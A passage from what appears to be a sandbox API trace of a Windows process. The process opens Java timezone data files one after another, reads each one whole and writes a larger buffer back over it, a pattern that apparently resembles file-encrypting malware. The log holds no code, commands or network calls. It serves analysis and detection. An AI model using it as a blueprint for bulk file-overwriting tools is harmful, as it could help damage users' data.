dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0138.045] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.046] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x41 [0138.046] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.046] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.046] ReleaseMutex (hMutex=0x168) returned 1 [0138.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Montserrat", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0138.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Montserrat", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Montserrat", lpUsedDefaultChar=0x0) returned 10 [0138.046] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2d5f2bc*=0x41, lpOverlapped=0x0) returned 1 [0138.047] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.047] WriteFile (in: hFile=0x1f0, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0138.048] CloseHandle (hObject=0x1f0) returned 1 [0138.048] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\new_salem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0138.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4fc [0138.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.049] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.049] ReleaseMutex (hMutex=0x168) returned 1 [0138.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="New_Salem", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0138.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="New_Salem", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="New_Salem", lpUsedDefaultChar=0x0) returned 9 [0138.049] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x4fc, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x2d5f2bc*=0x4fc, lpOverlapped=0x0) returned 1 [0138.109] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.109] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0xa84, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2d5f2d0*=0xa84, lpOverlapped=0x0) returned 1 [0138.110] CloseHandle (hObject=0x1f0) returned 1 [0138.110] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port_of_spain"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0138.111] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.111] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x41 [0138.111] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.111] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.112] ReleaseMutex (hMutex=0x168) returned 1 [0138.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Port_of_Spain", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Port_of_Spain", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Port_of_Spain", lpUsedDefaultChar=0x0) returned 13 [0138.112] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2d5f2bc*=0x41, lpOverlapped=0x0) returned 1 [0138.113] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.113] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0138.114] CloseHandle (hObject=0x1f0) returned 1 [0138.114] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santarem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0138.115] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.115] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x131 [0138.115] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.116] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.116] ReleaseMutex (hMutex=0x168) returned 1 [0138.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Santarem", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0138.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Santarem", cchWideChar=8, lpMultiByteStr=0x1f732cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Santarem", lpUsedDefaultChar=0x0) returned 8 [0138.116] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f21e28, nNumberOfBytesToRead=0x131, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f21e28*, lpNumberOfBytesRead=0x2d5f2bc*=0x131, lpOverlapped=0x0) returned 1 [0138.118] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.118] WriteFile (in: hFile=0x1f0, lpBuffer=0x2895ac8*, nNumberOfBytesToWrite=0x6b9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2895ac8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6b9, lpOverlapped=0x0) returned 1 [0138.118] CloseHandle (hObject=0x1f0) returned 1 [0138.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_kitts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0138.119] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.120] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x41 [0138.120] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.120] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.121] ReleaseMutex (hMutex=0x168) returned 1 [0138.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Kitts", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0138.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Kitts", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="St_Kitts", lpUsedDefaultChar=0x0) returned 8 [0138.121] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2d5f2bc*=0x41, lpOverlapped=0x0) returned 1 [0138.122] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.122] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0138.123] CloseHandle (hObject=0x1f0) returned 1 [0138.124] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tijuana"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0138.168] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.168] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4fc [0138.168] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.168] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.168] ReleaseMutex (hMutex=0x168) returned 1 [0138.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tijuana", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0138.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tijuana", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tijuana", lpUsedDefaultChar=0x0) returned 7 [0138.169] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x4fc, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x2d5f2bc*=0x4fc, lpOverlapped=0x0) returned 1 [0138.196] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.196] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0xa84, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2d5f2d0*=0xa84, lpOverlapped=0x0) returned 1 [0138.196] CloseHandle (hObject=0x1f0) returned 1 [0138.196] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\casey"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0138.198] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.198] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x65 [0138.198] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.199] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.199] ReleaseMutex (hMutex=0x168) returned 1 [0138.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Casey", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Casey", cchWideChar=5, lpMultiByteStr=0x1f7acfc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Casey", lpUsedDefaultChar=0x0) returned 5 [0138.199] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eb8c70, nNumberOfBytesToRead=0x65, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eb8c70*, lpNumberOfBytesRead=0x2d5f2bc*=0x65, lpOverlapped=0x0) returned 1 [0138.200] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.201] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5ed, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5ed, lpOverlapped=0x0) returned 1 [0138.201] CloseHandle (hObject=0x1f0) returned 1 [0138.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\syowa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0138.203] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.203] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x41 [0138.203] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.203] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.203] ReleaseMutex (hMutex=0x168) returned 1 [0138.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Syowa", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Syowa", cchWideChar=5, lpMultiByteStr=0x1f7acfc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Syowa", lpUsedDefaultChar=0x0) returned 5 [0138.204] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2d5f2bc*=0x41, lpOverlapped=0x0) returned 1 [0138.205] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.205] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0138.206] CloseHandle (hObject=0x1f0) returned 1 [0138.206] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ashgabat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0138.207] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.207] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x10d [0138.207] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.207] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.208] ReleaseMutex (hMutex=0x168) returned 1 [0138.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ashgabat", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0138.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ashgabat", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ashgabat", lpUsedDefaultChar=0x0) returned 8 [0138.208] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ef2c78, nNumberOfBytesToRead=0x10d, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c78*, lpNumberOfBytesRead=0x2d5f2bc*=0x10d, lpOverlapped=0x0) returned 1 [0138.209] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.209] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a9cc8*, nNumberOfBytesToWrite=0x695, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a9cc8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x695, lpOverlapped=0x0) returned 1 [0138.210] CloseHandle (hObject=0x1f0) returned 1 [0138.210] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\choibalsan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0138.211] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.211] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1c1 [0138.212] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0138.212] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.212] ReleaseMutex (hMutex=0x168) returned 1 [0138.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Choibalsan", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0138.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Choibalsan", cchWideChar=10, lpMultiByteStr=0x1f732cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Choibalsan", lpUsedDefaultChar=0x0) returned 10 [0138.212] ReadFile (in: hFile=0x1f0, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1c1, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x1c1, lpOverlapped=0x0) returned 1 [0138.213] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.213] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x749, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2d5f2d0*=0x749, lpOverlapped=0x0) returned 1 [0139.373] CloseHandle (hObject=0x1f0) returned 1 [0139.374] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\gaza"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0139.375] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.375] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4d4 [0139.375] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.375] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.375] ReleaseMutex (hMutex=0x168) returned 1 [0139.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gaza", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0139.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gaza", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Gaza", lpUsedDefaultChar=0x0) returned 4 [0139.375] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f968, nNumberOfBytesToRead=0x4d4, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x2d5f2bc*=0x4d4, lpOverlapped=0x0) returned 1 [0139.413] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: 